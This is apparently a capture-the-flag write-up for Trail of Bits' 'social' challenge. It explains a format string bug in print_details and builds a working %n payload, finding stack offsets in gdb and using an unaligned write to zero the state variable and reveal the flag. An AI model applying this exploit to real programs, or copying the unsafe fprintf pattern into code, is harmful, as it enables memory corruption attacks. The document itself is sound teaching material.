Trail of Bits released a number of CTF challenges on GitHub.

This post is about the social binary exploitation challenge.

The social challenge is found in the ctf/exploits/binary1_workshop/social_format/ directory. It contains a binary (social), source code (social.c) and a Makefile.

From reading the source code we see that this application uses a state machine to drive a text-based menu system. The states essentially involve asking the user for data to fill out an internal data structure and then printing that data back. When a special state 0 is reached the flag is printed. However, no path through the code writes 0 to the state variable, so it looks like the challenge is to find and exploit a memory corruption bug to set this value.

The buffer management all looks safe; however, the print statements are vulnerable to format string injection.

    void print_details(Person* p,size_t age){
      fprintf(stdout, "name: ");
      fprintf(stdout, p->name);
      puts("");
      fprintf(stdout, "Age: %d\n", age);
      fprintf(stdout, "Description: ");
      fprintf(stdout, p->description);
      puts("");
      fflush(NULL);
      return;
    }

The p->name and p->description strings are both taken from the user and incorrectly passed as the format argument of fprintf.
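For contrast, here is a minimal sketch of the usual safe pattern, in which the untrusted text is passed as an argument to a constant format string. The helper name render_field is hypothetical and is not part of social.c; it writes into a buffer rather than stdout only so the result is easy to inspect.

```c
#include <assert.h>
#include <stddef.h>
#include <stdio.h>

/* Hypothetical helper, not part of social.c: renders untrusted text
 * through a constant "%s" format, so any % sequences in the input are
 * copied out literally instead of being interpreted as directives. */
int render_field(char *out, size_t out_size, const char *untrusted)
{
    assert(out != NULL && untrusted != NULL);
    /* The vulnerable pattern would be: snprintf(out, out_size, untrusted); */
    return snprintf(out, out_size, "%s", untrusted);
}
```

Calling render_field with the input %s%n%d simply copies those six characters into the buffer; no stack values are read and nothing is written through a pointer.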

We can prove this by including format specifiers in our name.

$ ./social
Welcome to mybookspacepage v00.01 Beta!
Name: %s
1.) Change your name
2.) Describe yourself
3.) Display all your information
4.) Exit the system
3
got your choice
Segmentation fault

The %n format specifier will cause printf to write the number of bytes written so far to an arbitrary memory location. The address to write to is read from a pointer on the stack (just like %s). Obviously the thing we want to overwrite is state so we might try using %n to write to the address of this variable.
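To see %n in isolation, the following small sketch uses it legitimately, with a literal format string and a pointer we supply ourselves. The function name chars_before_n is made up for illustration.

```c
#include <assert.h>
#include <stdio.h>

/* Returns the value that %n stores: the number of characters produced
 * before the %n directive was reached. The format string is a literal
 * and the pointer is ours, so this is the intended use of %n. */
int chars_before_n(void)
{
    char buf[32];
    int written = -1;
    snprintf(buf, sizeof buf, "hello%n world", &written);
    assert(written >= 0); /* %n has stored a count */
    return written;       /* 5, the length of "hello" */
}
```

In the exploit the mechanism is the same; the only difference is that the pointer %n dereferences is whatever value happens to sit in the next argument slot on the stack.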

Getting an address of our choosing onto the stack may seem difficult at first, but if we look at the print_details function, the second parameter is the user-supplied age, which is therefore pushed onto the stack when the function is called. All we need to do is use some other well-known format specifiers to pop the right number of preceding values from the stack to get to the age parameter.

We cannot predict the stack layout by reading the source code but we can if we look at the disassembly.

+-----------------------------------------+
| instruction           |   esp  | change |
+-----------------------------------------+
| mov ebp, esp          |     0  |    0   |
| sub esp, 8            |    -8  |   -8   |
| ...                   |        |        |
| push 6                |   -12  |   -4   |
| push 1                |   -16  |   -4   |
| push str.name:        |   -20  |   -4   |
| ...                   |        |        |
| add esp, 0x10         |    -4  |  +16   |
| ...                   |        |        |
| sub esp, 8            |   -12  |   -8   |
| push edx              |   -16  |   -4   |
| push eax              |   -20  |   -4   |
| ...                   |        |        |
| add esp, 0x10         |    -4  |  +16   |
| sub esp, 0xc          |   -16  |  -12   |
| push 0x8048cf2        |   -20  |   -4   |
| ...                   |        |        |
| add esp, 0x10         |    -4  |  +16   |
| ...                   |        |        |
| sub esp, 4            |    -8  |   -4   |
| push dword [arg_ch]   |   -12  |   -4   |
| push str.Age:__d_n    |   -16  |   -4   |
| push eax              |   -20  |   -4   |
| ...                   |        |        |
| add esp, 0x10         |    -4  |  +16   |
| ...                   |        |        |
| push eax              |    -8  |   -4   |
| push 0xd              |   -12  |   -4   |
| push 1                |   -16  |   -4   |
| push str.Description: |   -20  |   -4   |
| ...                   |        |        |
| add esp, 0x10         |    -4  |  +16   |
| sub esp, 8            |   -12  |   -8   |
| push edx              |   -16  |   -4   |
| push eax              |   -20  |   -4   |
| call sym.imp.fprintf  |        |        |
+-----------------------------------------+

So it looks like when we get to the description fprintf call, esp will be ebp - 20. And basic x86 knowledge tells us that the final function argument will be at ebp + 8. So 28 bytes (8 - (-20)) are on the stack between esp and age. Each %d format specifier consumes 4 bytes from the stack, so we need 7 (28/4) %ds to get to the value we want. Let’s try it out.

$ ./social
Welcome to mybookspacepage v00.01 Beta!
...
Description: %d.%d.%d.%d.%d.%d.%d -->%d<--
Age: 666
...
Age: 666
Description: 13.-134513344.0.1.-8232.134515556.134525048 -->666<--

Replacing the final %d in our description with %n will attempt a write to address 666 instead of printing it as a decimal number. So if we enter the address of state as our age, we should be able to change its value.
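The description string can be generated rather than typed by hand. This is only a sketch: build_description is a hypothetical helper, and the count of seven leading specifiers is the one found in the experiment above, so it would need to be re-measured for a different build of the binary.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: writes `pops` copies of "%d." followed by "%n"
 * into out. Returns 0 on success, or -1 if out is too small. */
int build_description(char *out, size_t out_size, int pops)
{
    assert(out != NULL && pops >= 0);
    /* Each "%d." is 3 bytes, "%n" is 2 bytes, plus the terminating NUL. */
    size_t needed = (size_t)pops * 3 + 2 + 1;
    if (out_size < needed)
        return -1;
    out[0] = '\0';
    for (int i = 0; i < pops; i++)
        strcat(out, "%d.");
    strcat(out, "%n");
    return 0;
}
```

With pops set to 7 this produces %d.%d.%d.%d.%d.%d.%d.%n, which can be pasted at the Description prompt.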

We can find out the address of state through nm because it is a global variable. Remember that we need to convert it to base 10 before entering it as our age.

$ nm social | grep state
0804b050 D state
$ printf %d 0x$(nm social | awk '/state/ {print $1}')
134525008
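The same conversion can be done in C with strtoul, which may be convenient if the payload is being generated by a program. The function name age_from_nm_hex is an assumption made for this sketch.

```c
#include <assert.h>
#include <stdlib.h>

/* Converts the hexadecimal address column printed by nm into the
 * unsigned value to type at the Age prompt. */
unsigned long age_from_nm_hex(const char *hex)
{
    assert(hex != NULL);
    return strtoul(hex, NULL, 16);
}
```

Passing "0804b050" gives 134525008, matching the shell one-liner above.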

However, the program’s state machine will exit immediately upon encountering an “invalid” state, so we will need to use a debugger to set a breakpoint in main_loop and peek at the value before the program exits.

(gdb) disassemble main_loop
Dump of assembler code for function main_loop:
   ...
   0x08048ab0 <+44>:    mov    %eax,-0x30(%ebp)
   0x08048ab3 <+47>:    mov    0x804b050,%eax
   0x08048ab8 <+52>:    cmp    $0x6,%eax
   0x08048abb <+55>:    ja     0x8048bab <main_loop+295>
   ...

The instruction at address 0x08048ab3 copies the value of state (0x804b050) into eax, which corresponds to the start of the switch statement in main_loop. If we set a breakpoint here we can print out the value of state and continue.

(gdb) b *0x08048ab3
commands
x/dw 0x0804b050
c
end

r

Breakpoint 1, 0x08048ab3 in main_loop ()
0x804b050 <state>:      2
Description: %d.%d.%d.%d.%d.%d.%d.%n
Age: 134525008
...
Age: 134525008
Description: 13.-134513344.0.1.-8264.134515556.134525048.
...
Breakpoint 1, 0x08048ab3 in main_loop ()
0x804b050 <state>:      44
state 4
no no no no
...
Breakpoint 1, 0x08048ab3 in main_loop ()
0x804b050 <state>:      4
bye bye!
[Inferior 1 (process 4181) exited with code 01]
(gdb)

Excellent, we changed the state to 44. Try adding an extra space to the description and see the value of state change from 44 to 45. We definitely have control of state now. Unfortunately the value we need to set it to is 0. We cannot reduce the number of bytes written to 0 because we need to pop those first 7 values from the stack so this is going to take a little more cunning.
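The value 44 is simply the length of the text printed before %n is reached. As a quick check, this sketch formats the same seven stack values seen in the gdb session with a literal format string and asks snprintf how many characters that takes. The function name bytes_before_n is hypothetical.

```c
#include <assert.h>
#include <stdio.h>

/* Returns how many characters the seven "%d." conversions emit for the
 * stack values printed in the session above, which is the count that
 * %n would store. snprintf with a NULL buffer and size 0 only measures. */
int bytes_before_n(void)
{
    int n = snprintf(NULL, 0, "%d.%d.%d.%d.%d.%d.%d.",
                     13, -134513344, 0, 1, -8264, 134515556, 134525048);
    assert(n > 0);
    return n; /* 3 + 11 + 2 + 2 + 6 + 10 + 10 = 44 */
}
```

Any extra literal character placed before %n in the description raises the count by one, which is why adding a space moves state from 44 to 45.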

If we read the man page for printf we see this:

n      The number of characters written so far is stored into the inte‐
       ger pointed to by the  corresponding  argument.   That  argument
       shall  be  an  int *, or variant whose size matches the (option‐
       ally) supplied integer length modifier.   No  argument  is  con‐
       verted.   (This  specifier  is  not  supported  by  the bionic C
       library.)  The behavior is undefined if the conversion  specifi‐
       cation includes any flags, a field width, or a precision.

If %n expects an int* parameter then it may be safe to assume that it will write an int to our selected memory address. Let’s prove this to ourselves with gdb. We will add a new breakpoint on the print_details function, set every bit of the 4-byte state variable to 1, and then do the format string injection again.

(gdb) b print_details
Breakpoint 2 at 0x80488cf

Breakpoint 2, 0x080488cf in print_details ()
(gdb) set {int}0x804b050 = 0xffffffff
(gdb) x/dw 0x0804b050
0x804b050 <state>:      -1
(gdb) c
Continuing.
...
Age: 134525008
Description: 13.-134513344.0.1.-8264.134515556.134525048.
...
Breakpoint 1, 0x08048ab3 in main_loop ()
0x804b050 <state>:      44
state 4
no no no no

Breakpoint 1, 0x08048ab3 in main_loop ()
0x804b050 <state>:      4
bye bye!
[Inferior 1 (process 19230) exited with code 01]
(gdb)

This proves that %n is not just writing the single byte 44 (0x2c) to state but the full 4-byte value 0x0000002c. The interesting thing about the x86 architecture is that unaligned memory access is perfectly legal. So what if, instead of setting our age to 0x0804b050, we set it to 0x0804b050 - 1?

Age: 134525007
Description: 13.-134513344.0.1.-8264.134515556.134525048.


Breakpoint 1, 0x08048ab3 in main_loop ()
0x804b050 <state>:      0
Format strings are tricky, forma
Breakpoint 1, 0x08048ab3 in main_loop ()
0x804b050 <state>:      4
bye bye!
[Inferior 1 (process 31542) exited with code 01]
(gdb)

That’s a bingo, although the flag appears to be truncated due to a bug in the code (it only reads 32 bytes from the key file). I’m not sure if this is a genuine bug or an extension to the challenge that I missed.

To understand why this works we need to think about endianness. The x86 architecture is little-endian, which means that values are stored in memory least significant byte first. So a 4-byte integer such as state will be stored like this.

| 0x804b050 | 0x804b051 | 0x804b052 | 0x804b053 |
|    0x05   |    0x00   |    0x00   |    0x00   |

You can prove this to yourself in gdb. Observe that examining the value stored at 0x0804b050 as a 4-byte word (w) and as a single byte (b) yields the same value. Note that in gdb’s x command the w size is 4 bytes; a 2-byte read would use h instead.

(gdb) x/dw 0x0804b050
0x804b050 <state>:      5
(gdb) x/w 0x0804b050
0x804b050 <state>:      5
(gdb) x/b 0x0804b050
0x804b050 <state>:      5

Before and after using %n to write 44 (0x2c) as a 4 byte integer to 0x804b04f can be visualised like this.

| 0x804b04f | 0x804b050 | 0x804b051 | 0x804b052 | 0x804b053 |
|    0x??   |    0x05   |    0x00   |    0x00   |    0x00   |

| 0x804b04f | 0x804b050 | 0x804b051 | 0x804b052 | 0x804b053 |
|    0x2c   |    0x00   |    0x00   |    0x00   |    0x00   |
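The before and after pictures can be reproduced with a small model of those five bytes. This is a sketch rather than anything taken from the challenge: the array stands in for addresses 0x804b04f to 0x804b053, the 0xAA filler for the unknown byte is arbitrary, and store_le32 and load_le32 are hypothetical helpers that lay bytes out explicitly so the result does not depend on the host's byte order.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Stores a 32-bit value least significant byte first, starting at
 * mem[offset], one byte at a time. */
void store_le32(uint8_t *mem, size_t offset, uint32_t value)
{
    assert(mem != NULL);
    for (int i = 0; i < 4; i++)
        mem[offset + i] = (uint8_t)(value >> (8 * i));
}

/* Reads a 32-bit little-endian value starting at mem[offset]. */
uint32_t load_le32(const uint8_t *mem, size_t offset)
{
    assert(mem != NULL);
    uint32_t v = 0;
    for (int i = 0; i < 4; i++)
        v |= (uint32_t)mem[offset + i] << (8 * i);
    return v;
}
```

Starting from the bytes {0xAA, 0x05, 0x00, 0x00, 0x00}, where index 1 corresponds to 0x804b050, calling store_le32(mem, 0, 44) puts 0x2c at index 0 and zeros at indexes 1 to 3. Index 4 was already zero, so load_le32(mem, 1), our stand-in for reading state, now returns 0.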